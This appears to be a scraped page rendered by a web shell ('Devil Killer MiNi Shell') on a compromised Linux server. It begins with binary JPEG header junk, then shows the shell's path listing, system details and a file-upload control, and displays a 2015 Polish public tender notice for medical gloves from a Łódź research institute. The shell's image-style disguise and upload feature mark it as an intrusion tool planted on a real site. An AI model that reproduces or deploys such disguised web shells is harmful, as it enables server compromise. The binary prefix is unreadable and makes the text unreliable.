JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151127/174987-N-2015.html

<p class="kh_header"><b>Łódź: Dostawa rękawic diagnostycznych i chirurgicznych dla Instytutu CZMP - ZP/155/2015</b><br>
<b>Numer ogłoszenia: 174987 - 2015; data zamieszczenia: 27.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut "Centrum Zdrowia Matki Polki" , ul. Rzgowska 281/289, 93-338 Łódź, woj. łódzkie, tel. 42 271 17 52; 271 17 53, faks 42 271 17 50.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.iczmp.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytut Badawczy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa rękawic diagnostycznych i chirurgicznych dla Instytutu CZMP - ZP/155/2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> <br/>	1.	Rękawice diagnostyczne, niesterylne, lateksowe bezpudrowe z wewnętrzną warstwą polimerową, mikroteksturowane lub teksturowane (na końcach palców lub na całej powierzchni), spełniające normy EN 455 (zamawiający dopuszcza tolerancję w długości rękawicy określonej w normie +/- 5 mm), EN 420, EN 374 - 3 , AQL mniejsze lub równe1,5 - oznaczenie na opakowaniu, zawartość protein mniejsza lub równa 34,5 ug/g na rękawice, oznakowane podwójnie, jako wyrób medyczny klasy I i środek ochrony indywidualnej kategorii III. Rozm. S, M, L, XL po max. 200 sztuk w op. Na opakowaniu muszą być umieszczone: data produkcji, termin ważności, numer serii, nazwa i adres producenta, informacje w języku polskim oraz znak CE. 
Rękawice możliwe do założenia (niesklejone). Rękawice nie mogą pękać podczas zakładania. Rękawice nie mogą posiadać zgrubień i grudek w swojej strukturze. Rękawice w opakowaniu muszą być ułożone równomiernie jedna na drugiej, co umożliwia łatwe wyjmowanie rękawiczki po rękawiczce z opakowania (nie mogą być zrolowane i wyjmować się po kilka na raz) -	640 000	szt.
<br/>	2.	Rękawice diagnostyczne, niesterylne, nitrylowe bezpudrowe, cienkie, grubość w obszarze dłoni i/lub palców 0,1 +/-0,01 mm, teksturowane (na końcach palców lub na całej powierzchni), spełniające normy EN 455 (zamawiajacy dopuszcza tolerancję w długości rękawicy określonej w normie +/- 5 mm), EN 420, EN 455, ATSM F 1671, EN 388, EN 374 - 3, AQL mniejsze lub równe1,5 - oznaczenie na opakowaniu,  oznakowane podwójnie, jako wyrób medyczny klasy I i środek ochrony indywidualnej kategorii III. Rozm. S, M, L, XL po max. 200 szt w op. Rękawice muszą być pozbawione tiuramów. Na opakowaniu muszą być umieszczone: data produkcji, termin ważności, numer serii, nazwa i adres producenta, informacje w języku polskim oraz znak CE. 
Rękawice możliwe do założenia (niesklejone). Rękawice nie mogą pękać podczas zakładania. Rękawice nie mogą posiadać zgrubień i grudek w swojej strukturze. Rękawice w opakowaniu muszą być ułożone równomiernie jedna na drugiej, co umożliwia łatwe wyjmowanie rękawiczki po rękawiczce z opakowania (nie mogą być zrolowane i wyjmować się po kilka na raz) -	1 217 400	szt.
<br/>	3.	Rękawice diagnostyczne, niesterylne, nitrylowe bezpudrowe, cienkie, grubość w obszarze dłoni i/lub palców 0,1 +/-0,01 mm, teksturowane (na końcach palców lub na całej powierzchni), spełniające normy EN 455 (zamawiający dopuszcza tolerancję w długości rękawicy określonej w normie +/- 5 mm), EN 420, EN 455, ATSM F 1671, EN388, EN 374 - 3, AQL mniejsze lub równe1,5 - oznaczenie na opakowaniu,  oznakowane podwójnie, jako wyrób medyczny i środek ochrony osobistej kategorii III. Rozm. S, M, L, XL po max. 250 szt w op. Rękawice muszą być pozbawione tiuramów.
Rękawice nie mogą pękać podczas zakładania. Opakowania pasujące do uchwytów naściennych z możliwością wyjmowania rękawic od spodu opakowania bez ryzyka kontamninacji opakowania i pozostałych rękawic. Na opakowaniu muszą być umieszczone: data produkcji, termin ważności, numer serii, nazwa i adres producenta, informacje w języku polskim oraz znak CE. 
( Wykonawca w cenie oferty dostarczy uchwyty w ilości: 80 szt.- uchwytów potrójnych i 220 szt. uchwytów pojedynczych )-	2 506 600	szt.
<br/>	4.	Rękawice diagnostyczne lateksowe, pudrowane, poziom protein poniżej 103 ug/g, zgodne z norma EN 455 1, 2 i 3 oraz normą EN-374-3, AQL = 1,5, oznakowane podwójnie, jako wyrób medyczny klasy I i środek ochrony indywidualnej kategorii III.  rozmiar S i M, wykonane z naturalnego lateksu opakowanie 100 - 200 szt. Na opakowaniu muszą być umieszczone: data produkcji, termin ważności, numer serii, nazwa i adres producenta, informacje w języku polskim oraz znak CE. 
Rękawice nie mogą pękać podczas zakładania. Rękawiczki w opakowaniu muszą być ułożone równomiernie jedna na drugiej, co umożliwia łatwe wyjmowanie rękawiczki po rękawiczce z opakowania (nie mogą być zrolowane i wyjmować się po kilka na raz) -		szt.
<br/>	5.	Rękawice diagnostyczne z nitrylu bezpudrowe jednorazowego użytku niesterylne teksturowane pasujące na prawą i lewą rękę z dłuższym mankietem .Powierzchnia rękawic bez zgrubień i pęcherzy, rant mankietu równomiernie zrolowany. Dobra elastyczność i rozciągliwość, odporne na uszkodzenia mechaniczne. Rękawice nie mogą pękać podczas zakładania. Rękawiczki w opakowaniu muszą być ułożone równomiernie jedna na drugiej, co umożliwia łatwe wyjmowanie rękawiczki po rękawiczce z opakowania (nie mogą być zrolowane i wyjmować się po kilka na raz). AQL 1.5.Grubosc rękawicy (pojedyncza ścianka ): w strefie palców : 0,15mm+/-0,02, w części dłoniowej: 0,11mm+/-0,02mm,mankiet :0,09mm+/-0,02mm. Minimalna długość rękawicy 280mm. Zgodne z normą EN455-1,2, 3 i 4, EN 420, EN 374. Wyrób medyczny klasy I i środek ochrony osobistej kategorii  III. Przebadane na przenikanie wirusów substancji chemicznych i cytostatyków. Na opakowaniu muszą być umieszczone: data produkcji, termin ważności, numer serii, nazwa i adres producenta, informacje w języku polskim oraz znak CE. Rozmiar S,M,L. 
Zamawiający dopuszcza zaoferowanie rękawic o grubości na dłoni 0,08mm 
oraz na mankiecie 0,05 mm (w ramach niniejszych grubości tolerancja +/-0,02 
nie jest dopuszczalna)-	8 000	szt.
<br/>	6.	REKAWICE DO ZABIEGÓW WYSOKIEGO RYZYKA
Rękawica chirurgiczna,  lateksowa, bezpudrowa, sterylna o kształcie anatomicznym, kolor kremowy, mankiet prosty z listwą adhezyjną. Rękawice nie mogą pękać podczas zakładania. Opakowanie jednostkowe musi umożliwiać aseptyczne rozpakowanie i podanie rękawic (nie rozrywać się w sposób niekontrolowany). Rękawica musi dobrze przylegać do mankietu fartucha (nie zsuwać się). Opakowanie wewnętrzne papierowe umożliwiające aseptyczne rozpakowanie wyrobu, rękawiczki nie mogą wystawać z opakowania wewnętrznego. Powierzchnia zewnętrzna mikroteksturowana, chlorowana, powierzchnia wewnętrzna pokryta polimerem/poliuretan/ oraz dodatkowo powłoka antybakteryjna zawierająca glukonian chlorheksydyny: grubości: palec 0,220 mm, dłoń 0,200 mm mankiet 0,200 mm; długość min 290 mm; poziom protein lateksu  poniżej 30 ug/g badanie metoda HPLC; AQL 1,0; pakowane  po 25 par, rozmiary od 5,5 do 9,0; wyrób medyczny klasy III zgodny z normą PN EN 455 1-4 oraz normą ASTM F-1671. Rękawice redukujące przenikanie wirusów w przypadku narażenia na kontakt z krwią. Na opakowaniu muszą być umieszczone: data produkcji, termin ważności, numer serii, nazwa i adres producenta, informacje w języku polskim oraz 
znak CE -	550	par
<br/>	7.	Rękawice chirurgiczne, sterylne, lateksowe pudrowane mączką kukurydzianą, AQL mniejsze lub równe1,5, mankiet rolowany lub prosty, mikroteksturowane, zawartość protein mniejsza lub równa 80 ug/g, opakowanie zewnętrzne foliowe lub papierowe obustronnie foliowany od wewnątrz lub papier - papier foliowany od wewnątrz, opakowanie wewnętrzne papierowe umożliwiające aseptyczne rozpakowanie wyrobu, rękawiczki nie mogą wystawać z opakowania wewnętrznego, zgodne z normą EN-374-3, sterylizowane radiacyjnie, w rozmiarach 6,0-8,5. 
Rękawice nie mogą pękać podczas zakładania. Opakowanie jednostkowe musi umożliwiać aseptyczne rozpakowanie i podanie rękawic (nie rozrywać się w sposób niekontrolowany). Rękawica musi dobrze przylegać do mankietu fartucha (nie zsuwać się). Rękawice nie mogą posiadać zgrubień i grudek w swojej strukturze. Mączka kukurydziana musi być równomiernie rozłożona na całej powierzchni rękawicy. Na opakowaniu muszą być umieszczone: data produkcji, termin ważności, numer serii, nazwa i adres producenta, informacje w języku polskim oraz znak CE	-	66 000	par
<br/>	8.	Rękawice chirurgiczne, sterylne, lateksowe bezpudrowe, z warstwą polimerową, AQL mniejsze lub równe1,5, mankiet rolowany lub prosty, mikroteksturowane, zawartość protein mniejsze lub równe 30 ug/g, opakowanie zewnętrzne foliowe lub papierowe obustronnie foliowany od wewnątrz lub papier-papier od wewnątrz foliowany, opakowanie wewnętrzne papierowe umożliwiające aseptyczne rozpakowanie  wyrobu - rękawiczki nie mogą wystawać z opakowania wewnętrznego, zgodne z normą EN-374-3, sterylizowane radiacyjnie, w rozmiarach 6,0-8,5. 
Rękawice nie mogą pękać podczas zakładania. Opakowanie jednostkowe musi umożliwiać aseptyczne rozpakowanie i podanie rękawic (nie rozrywać się w sposób niekontrolowany). Rękawica musi dobrze przylegać do mankietu fartucha (nie zsuwać się). Rękawice nie mogą posiadać zgrubień i grudek w swojej strukturze.
Na opakowaniu muszą być umieszczone: data produkcji, termin ważności, numer serii, nazwa i adres producenta, informacje w języku polskim oraz znak CE	-	101 000	par
<br/>	9.	Rękawice chirurgiczne, sterylne, syntetyczne neoprenowe, bezpudrowe, mankiet rolowany lub prosty. Powierzchnia zewnętrzna mikroteksturowana, chlorowana i silikonowana. Powierzchnia wewnętrzna pokryta warstwą poliuretanową i silikonowana. Grubość pojedynczej ścianki na palcu 0,185 - 0,200 mm, na dłoni 0,175 - 0,190 mm, na mankiecie 0,160 mm. Długość rękawicy minimalna 305 mm, AQL = 1, zgodne z normą EN 455 w części 1, 2 i 3. Opakowanie odporne na wilgoć foliowe lub papier-papier od wewnątrz foliowany. Rękawice w rozmiarach od 6 do 9. Rękawice nie mogą pękać podczas zakładania. Opakowanie jednostkowe musi umożliwiać aseptyczne rozpakowanie i podanie rękawic (nie rozrywać się w sposób niekontrolowany). Rękawica musi dobrze przylegać do mankietu fartucha (nie zsuwać się). Rękawice nie mogą posiadać zgrubień i grudek w swojej strukturze.
Na opakowaniu muszą być umieszczone: data produkcji, termin ważności, numer serii, nazwa i adres producenta, informacje w języku polskim oraz znak CE-	13 800	par
<br/>	10.	Rękawice chirurgiczne, sterylne lateksowe bezpudrowe o bardzo cienkich ściankach do zabiegów mikrochirurgicznych - grubość ściany rękawicy w obszarze dłoni i/lub palców od 0,16 mm do 0,19 mm, z wewnętrzną warstwą polimerową, AQL mniejsze lub równe1,5, zawartość protein poniżej30 ug/g, opakowanie zewnętrzne foliowe lub papierowe obustronnie foliowane od wewnątrz lub z jednej strony pokrywane folią a z drugiej strony pokrywane rastrowo lakierem lub papier-papier od wewnątrz foliowany , opakowanie wewnętrzne papierowe umożliwiające aseptyczne rozpakowanie  wyrobu - rękawiczki nie mogą wystawać z opakowania wewnętrznego, zgodne z normą EN-374-3, sterylizowane radiacyjnie, w rozmiarach 6,0-8,5. 
Rękawice nie mogą pękać podczas zakładania. Opakowanie jednostkowe musi umożliwiać aseptyczne rozpakowanie i podanie rękawic (nie rozrywać się w sposób niekontrolowany). Rękawica musi dobrze przylegać do mankietu fartucha (nie zsuwać się). Rękawice nie mogą posiadać zgrubień i grudek w swojej strukturze.
Na opakowaniu muszą być umieszczone: data produkcji, termin ważności, numer serii, nazwa i adres producenta, informacje w języku polskim oraz 
znak CE -	6 600	par
<br/>	11.	Rękawice chirurgiczne lateksowe bezpudrowe o zwiększonej grubości do zabiegów ortopedycznych - grubość w obszarze dłoni i/lub palców  0,30-0,32mm, mikroteksturowane, odporne na przekłucia i rozdarcia, zawartość protein poniżej 50 ug/g, AQL mniejsze lub równe1,5 , mankiet rolowany lub prosty, zgodne z normą EN-374-3, opakowanie zewnętrzne foliowe lub papierowe obustronnie foliowane od wewnątrz, opakowanie wewnętrzne papierowe umożliwiające aseptyczne rozpakowanie  wyrobu - rękawiczki nie mogą wystawać z opakowania wewnętrznego , sterylizowane radiacyjnie, w rozmiarach 6,0-8,5.  Rękawice nie mogą pękać podczas zakładania. Opakowanie jednostkowe musi umożliwiać aseptyczne rozpakowanie i podanie rękawic (nie rozrywać się w sposób niekontrolowany). Rękawica musi dobrze przylegać do mankietu fartucha (nie zsuwać się). Rękawice nie mogą posiadać zgrubień i grudek w swojej strukturze.
Na opakowaniu muszą być umieszczone: data produkcji, termin ważności, numer serii, nazwa i adres producenta, informacje w języku polskim oraz znak CE -	2 000	par.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.14.20-0, 18.42.40.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;"><br/>I. Dokumenty potwierdzające dopuszczenie produktu do obrotu na terytorium RP zgodnie z przepisami ustawy o wyrobach medycznych z 20.05.2010, Dz.U. Nr 107, poz. 679 - Oświadczenie wykonawcy
<br/>II. Dokumenty opisujące specyfikę wyrobu:
<br/>1.	Dokument potwierdzający średnią zawartość protein w oferowanych rękawiczkach wystawiony nie wcześniej niż w 2014r - dotyczy Pozycji 1, 4, 6, 7, 8, 10, 11.
<br/>2.	Dokument potwierdzający liczbę AQL w oferowanych rękawiczkach - dotyczy Pozycji 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11
<br/>3.	Katalog lub ulotki producenta - dotyczy wszystkich pozycji
<br/>4.	Oświadczenie wykonawcy lub producenta, że rękawice oferowane w Pozycji 6 są dopuszczone do stosowania w przypadku narażenia na kontakt z krwią - przenikanie wirusów.
<br/>5.	Dokument potwierdzający (badania jednostki niezależnej), że rękawice są pozbawione tiuramów - dotyczy Pozycji 2 i 3
<br/>6.	Oświadczenie producenta, że oferowane rękawice są odporne na przenikanie wirusów, substancji chemicznych i cytostatyków - dotyczy Pozycji 5</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku, gdy Wykonawca przewiduje wykonanie zamówienia z udziałem podwykonawców, Zamawiający żąda dołączenia do oferty wypełnionego oświadczenia z wykazem zakresu części zamówienia zlecanych podwykonawcom</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin dostawy - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p><br/>Na podstawie art.144 ust. 1 PZP Zamawiający przewiduje możliwość dokonania zmiany w zawartej umowie w następujących sytuacjach:
<br/>1.	zmiany numeru katalogowego lub nazwy produktu przy zachowaniu jego parametrów;
<br/>2.	niewykorzystania ilości w okresie trwania umowy - Zamawiający przewiduje możliwość zmiany terminu obowiązywania umowy;
<br/>3.	zmiany sposobu konfekcjonowania, (w wyniku niniejszej zmiany Zamawiający przewiduje możliwość zmiany ceny jednostkowej opakowania, która zostanie wyliczona z proporcji);
<br/>4.	w przypadku przejściowego braku asortymentu będącego przedmiotem niniejszej umowy, przy jednoczesnym dostarczeniu produktu zamiennego o parametrach nie gorszych od produktu objętego umową, po cenie nie wyższej niż cena jednostkowa zaoferowana w ofercie;
<br/>5.	zmiany przedmiotowej / produkt zamienny jeśli wystąpi trwały brak produktu, przy jednoczesnym dostarczeniu produktu zamiennego o  parametrach nie gorszych od produktu objętego umową, po cenie nie wyższej niż cena jednostkowa zaoferowana w ofercie;
<br/>6.	w przypadku wyczerpania ilości asortymentu z danego pakietu/pozycji (wskazanego/wskazanej w formularzu cenowym), dopuszcza się zmianę umowy polegającą na zwiększeniu ilości wyczerpanego asortymentu przy jednoczesnym zmniejszeniu ilości asortymentu z innego pakietu/pozycji, przy zachowaniu zaoferowanych w postępowaniu cen. Zmiana taka nie może spowodować zwiększenia kwoty netto umowy.
<br/>7.	zmiany organizacyjnej Instytutu CZMP istotnej dla realizacji niniejszej umowy;
<br/>8.	zmiany formy prawnej prowadzonej działalności gospodarczej;
<br/>9.	zmiany adresu siedziby firmy, zmiany adresu zamieszkania właściciela lub współwłaściciela firmy;
<br/>10.	zmiany wysokości wynagrodzenia należnego wykonawcy, w przypadku terminu obowiązywania umowy dłuższego niż 12 miesięcy, w przypadku zmiany:
<br/>1) wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę,
<br/>2) zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne 
- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez wykonawcę, w zakresie określonym w umowie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.iczmp.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielna Sekcja Zamówień Publicznych Instytutu Centrum Zdrowia Matki Polki, 93-338 Łódź ul. Rzgowska 281/289, pawilon A (Ginekologiczno-Położniczy), poziom 0, pokój Nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.12.2015 godzina 11:00, miejsce: Samodzielna Sekcja Zamówień Publicznych Instytutu Centrum Zdrowia Matki Polki, 93-338 Łódź ul. Rzgowska 281/289, pawilon A (Ginekologiczno-Położniczy), poziom 0, pokój Nr 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





